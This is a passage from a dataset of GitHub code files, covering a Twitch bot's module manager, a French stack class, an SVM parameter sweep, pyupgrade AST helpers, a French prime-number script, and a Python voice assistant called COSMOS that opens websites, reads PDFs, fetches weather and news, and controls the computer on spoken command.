modules\n self.modules: list[BaseModule] = []\n\n # List of all available modules, both enabled and disabled\n self.all_modules: list[BaseModule] = []\n\n self.bot = bot\n\n if socket_manager:\n socket_manager.add_handler(\"module.update\", self.on_module_update)\n\n def get_module(self, module_id: str) -> Optional[BaseModule]:\n return find(lambda m: m.ID == module_id, self.all_modules)\n\n def on_module_update(self, data: HandlerParam) -> None:\n new_state = data.get(\"new_state\", None)\n if new_state is True:\n self.enable_module(data[\"id\"])\n elif new_state is False:\n self.disable_module(data[\"id\"])\n else:\n module = self.get_module(data[\"id\"])\n\n if module:\n module.load()\n module.on_loaded()\n\n def enable_module(self, module_id: str) -> bool:\n module = self.get_module(module_id)\n if module is None:\n log.error(f\"No module with the ID {module_id} found.\")\n return False\n\n module.load()\n module.on_loaded()\n\n module.enable(self.bot)\n\n if module in self.modules:\n log.error(\"Module %s is already in the list of enabled modules pajaW\", module_id)\n return False\n\n self.modules.append(module)\n\n return True\n\n def disable_module(self, module_id: str) -> bool:\n module = self.get_module(module_id)\n if not module:\n log.error(f\"No module with the ID {module_id} found.\")\n return False\n\n module.disable(self.bot)\n\n if module not in self.modules:\n log.error(f\"Module {module_id} is not in the list of enabled modules pajaW\")\n return False\n\n self.modules.remove(module)\n\n return True\n\n def load(self, do_reload: bool = True) -> ModuleManager:\n \"\"\"Load module classes\"\"\"\n\n from pajbot.modules import available_modules\n\n self.all_modules = [module(self.bot) for module in available_modules]\n\n with DBManager.create_session_scope() as db_session:\n # Make sure there's a row in the DB for each module that's available\n db_modules = db_session.query(Module).all()\n for module in self.all_modules:\n mod = find(lambda db_module: db_module.id == module.ID, db_modules)\n if 
mod is None:\n log.info(f\"Creating row in DB for module {module.ID}\")\n mod = Module(module.ID, enabled=module.ENABLED_DEFAULT)\n db_session.add(mod)\n\n if do_reload is True:\n # Mark modules as enabled/disabled if their state has changed\n self.reload()\n\n return self\n\n def _disable_all_modules(self) -> None:\n for module in self.modules:\n module.disable(self.bot)\n\n def _load_enabled_modules(self) -> None:\n \"\"\"Load modules from the database and put them into the modules list\"\"\"\n with DBManager.create_session_scope() as db_session:\n for enabled_module in db_session.query(Module).filter_by(enabled=True):\n module = self.get_module(enabled_module.id)\n if module is not None:\n options = {}\n if enabled_module.settings is not None:\n try:\n options[\"settings\"] = json.loads(enabled_module.settings)\n except ValueError:\n log.warning(\"Invalid JSON\")\n\n self.modules.append(module.load(**options))\n module.on_loaded()\n module.enable(self.bot)\n\n def _disable_orphan_modules(self) -> None:\n to_be_removed: list[BaseModule] = []\n self.modules.sort(key=lambda m: 1 if m.PARENT_MODULE is not None else 0)\n for module in self.modules:\n if module.PARENT_MODULE is None:\n module.submodules = []\n else:\n parent = find(lambda m: m.__class__ == module.PARENT_MODULE, self.modules)\n if parent is not None:\n parent.submodules.append(module)\n module.parent_module = parent\n else:\n # log.warning('Missing parent for module {}, disabling it.'.format(module.NAME))\n module.parent_module = None\n to_be_removed.append(module)\n\n for module in to_be_removed:\n module.disable(self.bot)\n self.modules.remove(module)\n\n def reload(self) -> None:\n # TODO: Make disable/enable better, so we don't need to disable modules\n # that we're just going to enable again further down below.\n self._disable_all_modules()\n\n self.modules.clear()\n\n self._load_enabled_modules()\n\n self._disable_orphan_modules()\n\n # Perform a last on_loaded call on each module.\n # This is used for things that require submodules to be loaded properly\n # i.e. 
the quest system\n for module in self.modules:\n module.on_loaded()\n\n def __getitem__(self, module_id: str) -> Optional[BaseModule]:\n for enabled_module in self.modules:\n if enabled_module.ID == module_id:\n return enabled_module\n\n return None\n\n def __contains__(self, module_id: str) -> bool:\n \"\"\"We override the contains operator for the ModuleManager.\n This allows us to use the following syntax to check if a module is enabled:\n if 'duel' in module_manager:\n \"\"\"\n\n for enabled_module in self.modules:\n if enabled_module.ID == module_id:\n return True\n\n return False\n","repo_name":"pajbot/pajbot","sub_path":"pajbot/models/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":6809,"program_lang":"python","lang":"en","doc_type":"code","stars":278,"dataset":"github-code","pt":"57"} +{"seq_id":"14374487244","text":"class Pile :\r\n def __init__(self):\r\n self.lst = []\r\n\r\n def est_vide(self):\r\n if self.lst == [] :\r\n return True\r\n else:\r\n return False\r\n\r\n def empiler(self, e):\r\n self.lst.append(e)\r\n return self.lst\r\n\r\n def sommet(self):\r\n if self.est_vide() == True :\r\n return\r\n else:\r\n return self.lst[-1]\r\n\r\n def depiler(self):\r\n assert(self.lst != []),'erreur'\r\n return self.lst.pop()\r\n\r\n\r\n def __str__(self): #__repr__\r\n self.str = \"\"\r\n for i in range(len(self.lst)):\r\n self.str = str(self.str) + str('|') + str(self.lst[-1-i]) + str('|') + str('\\n')\r\n if self.est_vide() == True:\r\n return str('|' + ' ' + '|')\r\n return str(self.str)\r\n\r\n def __repr__(self):\r\n self.str = \"\"\r\n for i in range(len(self.lst)):\r\n self.str = str(self.str) + str('|') + str(self.lst[-1-i]) + str('|') + str('\\n')\r\n return str(self.str)\r\n\r\n#-------------Ajoute de méthode-----------------#\r\n def hauteur(self):\r\n tab = []\r\n while self.est_vide() == False:\r\n tab.append(self.sommet())\r\n self.depiler()\r\n tab.reverse()\r\n for i in tab:\r\n self.empiler(i)\r\n return len(tab)\r\n","repo_name":"inca300/Calculatrice","sub_path":"Pile.py","file_name":"Pile.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"72543719858","text":"from tools import get_summary_graph, calculate_weights, update_summary_graph, get_summary_features, get_specific_graph_list\r\nfrom dataset import get_dataset\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.svm import LinearSVC\r\nfrom scipy import io\r\nimport numpy as np\r\nimport os\r\nfrom config import datasets\r\n\r\nparams_p = np.arange(0, 2, 0.1)\r\nparams_alpha = [0.001, 0.003, 0.005, 0.01, 0.03, 0.05, 0.08, 0.1, 0.15, 0.2, 0.3, 0.5, 1.0]\r\nepochs = 10\r\n\r\n \r\nfor dataset in datasets:\r\n results = np.zeros([len(params_p), len(params_alpha)])\r\n data_dir, positive_group, negative_group = dataset\r\n # data_dir, positive_group, negative_group = 'ADNI', 'LMCI', 'AD'\r\n save_mat_name = os.path.join('./experiments-results', '-'.join([data_dir, positive_group, negative_group])+'_acc.mat')\r\n\r\n for i, p in enumerate(params_p):\r\n for j, alpha in enumerate(params_alpha):\r\n acc_list = []\r\n for epoch in range(epochs):\r\n pos_train_features, neg_train_features, pos_test_features, neg_test_features = get_dataset(data_dir, positive_group, negative_group, gamma=p, threshold=alpha, split_ratio=0.7)\r\n train_x = np.concatenate([pos_train_features, neg_train_features])\r\n train_y = np.array([0]*pos_train_features.shape[0]+[1]*neg_train_features.shape[0])\r\n test_x = 
np.concatenate([pos_test_features, neg_test_features])\r\n test_y = np.array([0]*pos_test_features.shape[0]+[1]*neg_test_features.shape[0])\r\n clf = LinearSVC(max_iter=300000)\r\n clf.fit(train_x, train_y)\r\n test_result = (clf.predict(test_x) == test_y)\r\n acc = float(test_result.sum()) / len(test_result)\r\n acc_list.append(acc)\r\n results[i, j] = sum(acc_list)/epochs\r\n\r\n io.savemat(save_mat_name, {'results':results})","repo_name":"xiangzhumeng16/TempGSL","sub_path":"parameter.py","file_name":"parameter.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"32784962908","text":"import ast\nimport warnings\nfrom typing import Container\nfrom typing import Dict\nfrom typing import Set\nfrom typing import Union\n\nfrom tokenize_rt import Offset\n\n\ndef ast_parse(contents_text: str) -> ast.Module:\n # intentionally ignore warnings, we might be fixing warning-ridden syntax\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n return ast.parse(contents_text.encode())\n\n\ndef ast_to_offset(node: Union[ast.expr, ast.stmt]) -> Offset:\n return Offset(node.lineno, node.col_offset)\n\n\ndef is_name_attr(\n node: ast.AST,\n imports: Dict[str, Set[str]],\n mod: str,\n names: Container[str],\n) -> bool:\n return (\n isinstance(node, ast.Name) and\n node.id in names and\n node.id in imports[mod]\n ) or (\n isinstance(node, ast.Attribute) and\n isinstance(node.value, ast.Name) and\n node.value.id == mod and\n node.attr in names\n )\n\n\ndef has_starargs(call: ast.Call) -> bool:\n return (\n any(k.arg is None for k in call.keywords) or\n any(isinstance(a, ast.Starred) for a in call.args)\n )\n","repo_name":"HaydnG/dimensionality-reduction-ui","sub_path":"venv/Lib/site-packages/pyupgrade/_ast_helpers.py","file_name":"_ast_helpers.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"32025441282","text":"import pyttsx3\r\nimport speech_recognition as sr\r\nimport os\r\nimport subprocess\r\n#from requests import request , session\r\n#from pprint import pprint as pp\r\nimport json\r\nimport requests \r\nimport datetime \r\nfrom datetime import date\r\nimport time\r\nimport calendar\r\nimport warnings\r\nimport random\r\nimport wikipedia\r\nimport webbrowser\r\nfrom pywhatkit import sendwhatmsg_instantly\r\nimport smtplib\r\nimport sys\r\nimport pyjokes\r\nimport pyautogui\r\nimport PyPDF2\r\nfrom tkinter.filedialog import *\r\nimport psutil\r\nimport speedtest\r\nimport wolframalpha\r\n\r\nwarnings.filterwarnings(\"ignore\") #ignoring all the warnings\r\n\r\nif sys.platform == \"win32\":\r\n engine=pyttsx3.init('sapi5')\r\n voices=engine.getProperty('voices')\r\n engine.setProperty('voice',voices[1].id)\r\nelse:\r\n engine=pyttsx3.init('nsss') #sapi5 - SAPI5 on Windows #nsss - NSSpeechSynthesizer on Mac OS X #espeak - eSpeak on every other platform\r\n voices=engine.getProperty('voices')\r\n #for i in range(48):\r\n #print(voices[i].id)\r\n engine.setProperty('voice',voices[10].id)#10b 17 26 28 37 39\r\n\r\ndef speak(audio): #fn for talking txt to spch,audio is string\r\n engine.say(audio)#say fn for speaking\r\n print(audio)\r\n engine.runAndWait()\r\n\r\ndef take_command():\r\n r=sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print('Go ahead,I am listening....')\r\n #r.pause_threshold=1\r\n r.adjust_for_ambient_noise(source)\r\n audio=r.listen(source)\r\n try:\r\n 
print('Hold on a momment,Recognizing...')\r\n query=r.recognize_google(audio,language='en-in')\r\n print(f'User said:{query}\\n')\r\n except:\r\n speak(\"There was some problem please try again\") \r\n return \"None\"\r\n return query\r\n\r\ndef wish():\r\n hour = int(datetime.datetime.now().hour)\r\n if hour>=0 and hour<12:\r\n speak(\"Good Morning!\")\r\n\r\n elif hour>=12 and hour<18:\r\n speak(\"Good Afternoon!\") \r\n\r\n else:\r\n speak(\"Good Evening!\") \r\n\r\n speak(\"I am COSMOS. How may I help you\")\r\n\r\ndef open_file(filename,filename1):\r\n if sys.platform == \"win32\":\r\n os.startfile(filename)\r\n else:\r\n try:\r\n opener = f'/Applications/{filename}.app/Contents/MacOS/{filename1}' \r\n subprocess.call([opener]) \r\n except:\r\n opener = f'/System/Applications/{filename}.app/Contents/MacOS/{filename1}' \r\n subprocess.call([opener]) \r\n\r\ndef sendEmail(to,content):\r\n server=smtplib.SMTP(\"smtp.gmail.com\",587)\r\n server.ehlo()\r\n server.starttls()\r\n server.login(\"email\",\"password\")\r\n server.sendmail(\"email id\",to,content)\r\n server.close()\r\n\r\ndef news():\r\n #https://newsapi.org/ ##get apikey from here\r\n api_key='Your api key here!!!'\r\n main_url = f'http://newsapi.org/v2/top-headlines?sources=techcrunch&apiKey={api_key}'\r\n\r\n main_page = requests.get(main_url).json()\r\n # print(main_page)\r\n articles = main_page[\"articles\"]\r\n # print(articles)\r\n head = []\r\n numbers=[\"first\",\"second\",\"third\",\"fourth\",\"fifth\"]\r\n for ar in articles:\r\n head.append(ar[\"title\"])\r\n for i in range (len(numbers)):\r\n speak(f\"today's {numbers[i]} news is: {head[i]}\")\r\n\r\ndef crypto(slug):\r\n #https://coinmarketcap.com/ ##get apikey from here\r\n apiurl='https://pro-api.coinmarketcap.com'\r\n headers = {\r\n 'Accepts': 'application/json',\r\n 'X-CMC_PRO_API_KEY': 'Your api key here!!!',\r\n }\r\n\r\n session=requests.session()\r\n session.headers.update(headers)\r\n\r\n def coins_price(apiurl,slug):\r\n url=apiurl+'/v1/cryptocurrency/quotes/latest'\r\n parameters={'slug':slug}\r\n r=session.get(url,params=parameters)\r\n data=r.json()['data']\r\n all=str(data)\r\n x=all.find('price')\r\n all=all[x:x+20]\r\n for p in all.split():\r\n try: \r\n float(p)\r\n price=p\r\n except:\r\n pass\r\n speak(f'{slug} price is {price}')\r\n return price\r\n \r\n #pp(coins_price(apiurl,slug))\r\n coins_price(apiurl,slug)\r\n\r\ndef weather():\r\n def loc():\r\n try:\r\n ipadd=requests.get(\"https://api.ipify.org\").text\r\n url=\"https://get.geojs.io/v1/ip/geo/\"+ipadd+\".json\"\r\n geo_requests= requests.get(url)\r\n geo_data=geo_requests.json()\r\n city=geo_data['city']\r\n except:\r\n city='delhi'\r\n return city\r\n\r\n #https://home.openweathermap.org/ ##get apikey from here\r\n api_key = 'Your api key here!!!'\r\n base_url = 'https://api.openweathermap.org/data/2.5/weather?'\r\n city_name = loc()\r\n url = base_url + \"&q=\" + city_name + \"&appid=\" + api_key \r\n session=requests.session()\r\n r = session.get(url)\r\n data = r.json()\r\n #data\r\n if data[\"cod\"] != \"404\":\r\n y = data[\"main\"]\r\n current_temperature = y[\"temp\"]\r\n current_humidiy = y[\"humidity\"]\r\n z = data[\"weather\"]\r\n weather_description = z[0][\"description\"]\r\n #print(\" Temperature is \" +str(int(current_temperature-273.15)) +\" degree celcius\\n humidity is \" + str(current_humidiy) +\"%\\n description \" + str(weather_description))\r\n speak(\" Temperature is \" +str(int(current_temperature-273.15)) +\" degree celcius\\n humidity is \" + 
str(current_humidiy) +\"%\\n with \" + str(weather_description)+'in '+city_name)\r\n \r\n\r\ndef pdf_reader():\r\n book=askopenfilename()\r\n try: \r\n pdfreader=PyPDF2.PdfFileReader(book)\r\n pages=pdfreader.numPages\r\n speak(f\"Total numbers of pages in this pdf are {pages}\")\r\n speak(\"sir please enter the page number you want me to read\")\r\n pg=int(input(\"please enter the page number:\"))\r\n for num in range(pg,pages):\r\n page=pdfreader.getPage(pg)\r\n text=page.extractText()\r\n speak(text)\r\n except :\r\n speak(\"Operation Cancelled !\") \r\n \r\ndef adv_search():\r\n query=input('Question: ')\r\n #https://products.wolframalpha.com/api/ ##get apikey from here\r\n app_id='Your api key here!!!'\r\n client=wolframalpha.Client(app_id)\r\n if 'no thanks' in query or 'thanks' in query or 'close advance search mode' in query:\r\n speak('closing advance search mode')\r\n else:\r\n res=client.query(query)\r\n ans=next(res.results).text\r\n speak(ans)\r\n speak('want to search anything else?')\r\n adv_search() \r\n\r\ndef TaskExecution():\r\n\r\n # function for coin toss task\r\n def htLine1():\r\n speak(\"It's \" + res)\r\n def htLine2():\r\n speak(\"You got \" + res)\r\n def htLine3():\r\n speak(\"It landed on \" + res)\r\n\r\n wish()\r\n bye=True\r\n while bye:\r\n\r\n query=take_command().lower()\r\n #query=input() ##comment above and remove this for typing instead of speaking for testing\r\n\r\n # Tasks\r\n if \"what is your name\" in query:\r\n speak('I am COSMOS your virtual assistant.')\r\n continue\r\n \r\n if \"tell me about yourself\" in query:\r\n speak('I am COSMOS your virtual assistant. What can I do for you?')\r\n continue\r\n\r\n elif 'why cosmos' in query or 'Why is your name cosmos' in query:\r\n speak(\"Just like cosmos is filled with endless possibilities this program also have endless possibilites and thats why cosmos\")\r\n continue\r\n\r\n elif 'price of' in query or 'tell me the price of' in query:\r\n query=query.replace('tell me the price of ','')\r\n query=query.replace('price of ','')\r\n crypto(query)\r\n speak('need something else?')\r\n\r\n elif 'weather' in query:\r\n #query=query.replace('how is the weather in',' ')## can be made to take location ##not implemented\r\n #query=query.replace('weather in',' ')\r\n #query=query.replace('weather',' ')\r\n weather()\r\n speak('need something else?')\r\n\r\n elif \"open notepad\" in query:\r\n npath=\"C:\\\\WINDOWS\\\\system32\\\\notepad.exe\"\r\n os.startfile(npath)\r\n\r\n elif \"open command prompt\" in query:\r\n os.system(\"start cmd\") \r\n bye=False \r\n\r\n elif 'the time' in query:\r\n strTime=datetime.datetime.now().strftime('%H:%M')\r\n #print(f'its {strTime}')\r\n speak(f'its {strTime}')\r\n speak('you want me to do anything else?')\r\n\r\n elif \"todays date\" in query or \"the date\"in query:\r\n today = date.today()\r\n d2 = today.strftime(\"%B %d, %Y\")\r\n speak(f\"Today is {d2}\") \r\n speak('you want me to do anything else?')\r\n\r\n elif \"ip address\" in query:\r\n ip=requests.get('https://api.ipify.org').text#.text returns ip in unicode\r\n speak(f\"Your IP Address is {ip}\")\r\n speak('you want me to do anything else?')\r\n\r\n elif 'wikipedia' in query:\r\n speak('Searching in wikipedia')\r\n query=query.replace('wikipedia',' ')\r\n results=wikipedia.summary(query,sentences=2)\r\n speak('According to wikipedia')\r\n #print(results)\r\n speak(results)\r\n speak('you want me to do anything else')\r\n \r\n elif 'open google' in query:\r\n webbrowser.open(\"https://google.com\")\r\n 
bye=False\r\n \r\n elif 'open youtube' in query:\r\n webbrowser.open('https://youtube.com')\r\n bye=False\r\n\r\n elif 'what is' in query:\r\n #query=query.replace('what is',' ')\r\n result=wikipedia.summary(query,sentences=2)\r\n #print(result)\r\n speak(result)\r\n speak('anything else?')\r\n \r\n elif 'search in youtube' in query or 'open in youtube' in query: #search in youtube\r\n query=query.replace('search in youtube',' ')\r\n query=query.replace('open in youtube',' ')\r\n webbrowser.open(f'https://www.youtube.com/results?search_query={query}')\r\n speak(f'searchin in youtube {query}')\r\n bye=False\r\n\r\n #walframalpha\r\n elif 'advance search mode' in query or 'advanced search mode' in query:\r\n ##not gonna work by speaking input\r\n speak('Advance search mode activated')\r\n try:\r\n adv_search()\r\n except Exception as e:\r\n speak(\"Sorry,I am currently unable to find the answers.Please try again later\") \r\n speak('do you want me to do anything else?') \r\n continue\r\n\r\n elif 'search' in query or 'search in google' in query or 'open in google' in query: #search in google tab\r\n query=query.replace('search',' ')\r\n query=query.replace('search in google',' ')\r\n query=query.replace('open in google',' ')\r\n webbrowser.open(f\"https://google.com/search?q={query}\")\r\n speak(f'searching in google {query}')\r\n bye=False\r\n\r\n\r\n elif (\"open gfg\" in query or \"open geeksforgeeks\" in query):\r\n webbrowser.open(\"https://www.geeksforgeeks.org\")\r\n bye=False\r\n\r\n elif \"send message on whatsapp\" in query or 'send message' in query:\r\n speak(\"To whom should I send a message\")\r\n speak(\" Please type the number \")\r\n no=input(\"Enter the number:\")\r\n speak(\" what should I send ?\")\r\n speak('You will have to scan for whatsapp web.')\r\n subquery=take_command().lower()\r\n sendwhatmsg_instantly(f\"+91{no}\",f\"{subquery}\")\r\n bye=False\r\n\r\n elif \"email\" in query:\r\n try:\r\n speak(\"To whom do you want to send mail?\")\r\n to=input(\"Enter the mail id to whom you want to send:\")\r\n speak(\"what should i say?\")\r\n subquery=take_command().lower()\r\n sendEmail(to,subquery)\r\n speak(\"Email has been sent.\")\r\n speak('want to do anything else?')\r\n \r\n except Exception as e:\r\n speak(\"Sorry,I am currently unable to send the email.Please try again later\") \r\n speak('do you want me to do anything else?')\r\n\r\n elif 'visual studio code' in query or 'open code' in query or 'code' in query or 'visual code' in query:\r\n open_file('Visual Studio Code','Electron')\r\n speak('visual studio code is open now')\r\n bye=False\r\n \r\n elif 'safari' in query:\r\n open_file('Safari','Safari')\r\n speak('Safari is open now')\r\n bye=False\r\n \r\n elif 'calculator' in query:\r\n open_file('Calculator','Calculator')\r\n speak('Calculator is open now')\r\n bye=False\r\n\r\n elif 'chrome' in query:\r\n open_file('Google Chrome','Google Chrome')\r\n speak('Chrome is open now')\r\n bye=False\r\n\r\n elif \"close notepad\" in query:\r\n speak(\"okay sir, closing notepad\")\r\n os.system(\"taskkill/f /im notepad.exe\")\r\n speak('you want me to do anything else?')\r\n \r\n elif (\"close cmd\"in query or \"close command prompt\" in query):\r\n speak(\"okay sir, closing cmd\")\r\n os.system(\"taskkill /f /im cmd.exe\")\r\n speak('you want me to do anything else?')\r\n\r\n elif 'joke' in query or 'jokes' in query:\r\n joke = pyjokes.get_joke('en','all')\r\n #print(joke)\r\n speak(joke)\r\n speak('anything else?')\r\n\r\n elif 'jobs' in query or 'job' in query 
or 'job recommandation' in query or 'work' in query:\r\n platforms = [\r\n 'linkedin', 'indeed', 'glassdoor', 'hackerrank', 'naukri',\r\n 'intern shala'\r\n ]\r\n speak(\"Select a platform that you prefer:\")\r\n print('\\n'.join(platforms))\r\n statement1 = take_command().lower()\r\n #statement1 = input()\r\n if (statement1 == 0):\r\n continue\r\n if 'linkedin' in statement1 or 'LinkedIn' in statement1 or 'Linkedin' in statement1:\r\n webbrowser.open_new_tab(\"https://www.linkedin.com/jobs\")\r\n speak(\"LinkedIn is open now\")\r\n break\r\n elif 'indeed' in statement1:\r\n webbrowser.open_new_tab(\"https://www.indeed.com/jobs\")\r\n speak(\"Indeed is open now\")\r\n break\r\n elif 'glassdoor' in statement1:\r\n webbrowser.open_new_tab(\"https://www.glassdoor.com/jobs\")\r\n speak(\"Glassdoor is open now\")\r\n break\r\n elif 'hackerrank' in statement1:\r\n webbrowser.open_new_tab(\r\n \"https://www.hackerrank.com/jobs/search\")\r\n speak(\"HackerRank is open now\")\r\n break\r\n elif 'naukri' in statement1:\r\n webbrowser.open_new_tab(\"https://www.naukri.com/jobs\")\r\n speak(\"Naukri is open now\")\r\n break\r\n elif 'intern shala' in statement1:\r\n webbrowser.open_new_tab('internshala.com')\r\n speak('Intern Shala is open now')\r\n break\r\n else:\r\n speak(\"Sorry we couldn't find your search!!!\")\r\n speak('you want me to do anything else?')\r\n #time.sleep(3)\r\n \r\n\r\n elif \"shut down the system\" in query:\r\n os.system(\"shutdown /s /t 5\")\r\n\r\n elif 'movie ticket booking' in query or 'movie booking' in query or 'movie ticket' in query:\r\n speak('opening bookmyshow')\r\n webbrowser.open_new_tab(\"https://in.bookmyshow.com/\")\r\n speak(\" Book my show website is open now\")\r\n bye=False\r\n\r\n elif \"restart the system\" in query:\r\n os.system(\"shutdown /r /t 5\")\r\n\r\n elif 'online courses' in query or 'course' in query:\r\n platforms = [\r\n 'coursera', 'udemy', 'edx', 'skillshare', 'datacamp', 'udacity'\r\n ]\r\n speak(\"Select a platform that you prefer : \")\r\n print(\"\\n\".join(platforms))\r\n statement1 = take_command().lower()\r\n if statement1 == 0:\r\n continue\r\n if 'coursera' in statement1:\r\n webbrowser.open_new_tab(\"https://www.coursera.org\")\r\n speak(\"Coursera is open now\")\r\n bye=False\r\n elif 'udemy' in statement1:\r\n webbrowser.open_new_tab(\"https://www.udemy.com\")\r\n speak(\"udemy is open now\")\r\n bye=False\r\n elif 'edx' in statement1:\r\n webbrowser.open_new_tab(\"https://www.edx.org/\")\r\n speak(\"edx is open now\")\r\n bye=False\r\n elif 'skillshare' in statement1:\r\n webbrowser.open_new_tab(\"https://www.skillshare.com\")\r\n speak(\"skill share is open now\")\r\n bye=False\r\n elif 'datacamp' in statement1:\r\n webbrowser.open_new_tab(\"https://www.datacamp.com\")\r\n speak(\"datacamp is open now\")\r\n bye=False\r\n elif 'udacity' in statement1:\r\n webbrowser.open_new_tab(\"https://www.udacity.com\")\r\n speak(\"udacity is open now\")\r\n bye=False\r\n else:\r\n speak(\"Sorry we couldn't find your search!!!\")\r\n speak('you want me to do anything else?')\r\n\r\n elif 'train ticket booking' in query or 'train booking' in query or 'train ticket' in query or 'train ticket' in query:\r\n speak('opening website for train ticket booking')\r\n webbrowser.open_new_tab(\"https://www.railyatri.in/train-ticket/\")\r\n speak(\" IRCTC website is open now, have a good journey !\")\r\n bye=False\r\n\r\n elif 'bus ticket booking' in query or 'bus booking' in query or 'bus ticket' in query:\r\n speak('opening website for bus ticket 
booking')\r\n webbrowser.open_new_tab(\"https://www.redbus.in\")\r\n speak(\" Red bus website is open now, have a good journey !\")\r\n bye=False\r\n\r\n elif 'airplane ticket booking' in query or 'airplane booking' in query or 'airplane ticket' in query:\r\n speak('opening website for airplane ticket booking')\r\n webbrowser.open_new_tab(\"https://www.goindigo.in\")\r\n speak(\" Indigo website is open now, have a good journey !\")\r\n bye=False\r\n\r\n elif \"hotel\" in query or \"hotel booking\" in query:\r\n speak('Opening go ibibo .com')\r\n webbrowser.open_new_tab('https://goibibo.com/hotels')\r\n bye=False\r\n\r\n elif \"sleep the system\" in query:\r\n os.system(\"rundll32.exe powrprof.dll,SetSuspendState 0,1,0\")\r\n\r\n elif 'switch the window' in query:\r\n if sys.platform == \"win32\":\r\n pyautogui.keyDown(\"alt\")\r\n pyautogui.press(\"tab\")\r\n time.sleep(1)\r\n pyautogui.keyUp(\"alt\") \r\n bye=False\r\n else:\r\n pyautogui.keyDown(\"command\")\r\n pyautogui.press(\"tab\")\r\n time.sleep(1)\r\n pyautogui.keyUp(\"command\") \r\n bye=False\r\n\r\n elif (\"tell me news\" in query or \"news\" in query):\r\n speak(\"Please wait, Fetching the latest news\")\r\n news()\r\n speak('need something else?')\r\n\r\n elif (\"tell me my location\" in query or \"location\" in query):\r\n speak(\"Hold on,Locating our current location\")\r\n try:\r\n ipadd=requests.get(\"https://api.ipify.org\").text\r\n url=\"https://get.geojs.io/v1/ip/geo/\"+ipadd+\".json\"\r\n geo_requests= requests.get(url)\r\n geo_data=geo_requests.json()\r\n city=geo_data['city']\r\n country=geo_data['country']\r\n speak(f\"We are in {city},{country}\")\r\n speak('need something else?')\r\n\r\n except Exception as e:\r\n speak(\"Sorry,I am unable to locate our current location due to poor connectivity. Please try after sometime.\")\r\n bye=False\r\n\r\n elif \"take a screenshot\" in query or \"take screenshot\" in query:\r\n name=datetime.datetime.now()\r\n speak(\"taking screenshot...\")\r\n time.sleep(3)\r\n img=pyautogui.screenshot()\r\n img.save(f\"{name}.png\")\r\n speak(\"Screenshot taken\") \r\n speak('need anything else?')\r\n\r\n elif \"read pdf\" in query or \" read book \" in query :\r\n pdf_reader()\r\n bye=False\r\n \r\n elif \"how much battery is left\" in query or \"how much power is left\" in query or \"battery\" in query:\r\n battery=psutil.sensors_battery()\r\n percentage=battery.percent\r\n speak(f\"We have {percentage} percent battery. 
\")\r\n if percentage>=50:\r\n speak(\"We have enough power to go on.\")\r\n elif percentage>=20 and percentage<50:\r\n speak(\"You shall connect the system to a charging point\") \r\n elif percentage<20:\r\n speak(\"Battery about to die,connect to a charging point as soon as possible\")\r\n speak('you want me to do anything else')\r\n\r\n elif \"internet speed\" in query:\r\n speak(\"Checking internet speed\")\r\n st=speedtest.Speedtest()\r\n dl=round(float(st.download())/8000000,2)\r\n up=round(float(st.upload())/8000000,2)\r\n speak(f\"Current downloading speed is {dl}mb/s while uploading speed is {up}\") \r\n speak('you want me to do anything else?')\r\n\r\n elif \"volume up\" in query:\r\n pyautogui.press(\"volumeup\")\r\n speak('you want me to do anything else?')\r\n elif \"volume down\" in query:\r\n pyautogui.press(\"volumedown\")\r\n speak('you want me to do anything else?')\r\n elif \"volume mute\" in query or \"mute\" in query:\r\n pyautogui.press(\"volumemute\") \r\n speak('you want me to do anything else?')\r\n\r\n elif 'flip the coin' in query or 'toss the coin' in query or 'toss a coin' in query or 'flip a coin' in query:\r\n chances = ['Heads', 'Tails']\r\n res = random.choice(chances)\r\n picLine = random.randint(1, 3)\r\n lines = [htLine1, htLine2, htLine3]\r\n lines[picLine - 1]()\r\n speak('you want me to do anything else?')\r\n\r\n elif 'dice' in query:\r\n num = random.randint(1, 6)\r\n speak(\"Your rolled \" + str(num)) \r\n speak('you want me to do anything else?')\r\n\r\n elif 'bye' in query or 'no' in query or ' no thanks' in query:\r\n speak('Untill next time')\r\n bye=False\r\n\r\n else:\r\n speak(\"Sorry,I don't know how to do that right now but i am still learning how to be more helpful\")\r\n speak('anything else?')\r\n #time.sleep(2)\r\n\r\nif __name__==\"__main__\":\r\n TaskExecution()","repo_name":"Nishit014/COSMOS-Virtual-Assistant","sub_path":"cosmos_virtual_assistant_uf.py","file_name":"cosmos_virtual_assistant_uf.py","file_ext":"py","file_size_in_byte":23209,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"39965113530","text":"#determinar si un numero ingresado por el usuario es primo.\n#un numero primo: tiene, extactamente, 2 divisores positivos.\n#1 y si mismo.\n#ej 5 es primo, pues unico dos divisores 5, 1.\n\n#¿cuando un numero divide a otro?\n#sea n un natural, i otro natural, i divide a n si el rseto de dividir a n por i\n#es 0(y obtenemos un cociente entero).\n\n#EJ 10.\n#¿caules son los candidatos divisores de 10?\n#[1,10]=1,2,3,4,5,6,,7,8,9,10.\n\n#¿cuales son los divisores de 10?\n#Divisores de 10: 1,2,5,10\n\nn=int(input(\"ingresar un valor para n: \"))\n\ncont_divisores=0 #cantidad de divisores de n\nfor i in range (1,n+1):\n #resto=n%i variable.\n if n%i==0:#se encontro un divisor de n.\n cont_divisores=cont_divisores+1#se incrementa en 1 la cantidad de divisores.\nif cont_divisores > 2:\n print(n,\"no es primo\")\nelse:\n print(n,\"es primo\")","repo_name":"AbelAlarconOK/INTRODUCCION-PROGRAMACION","sub_path":"INTRODUCCION-PROGRAMACION/Pracitca 3/primos con for.py","file_name":"primos con for.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"7355185030","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport random\nimport torch\nimport numpy as np\nfrom collections import deque\nfrom itertools import product\nimport pandas as pd\nimport 
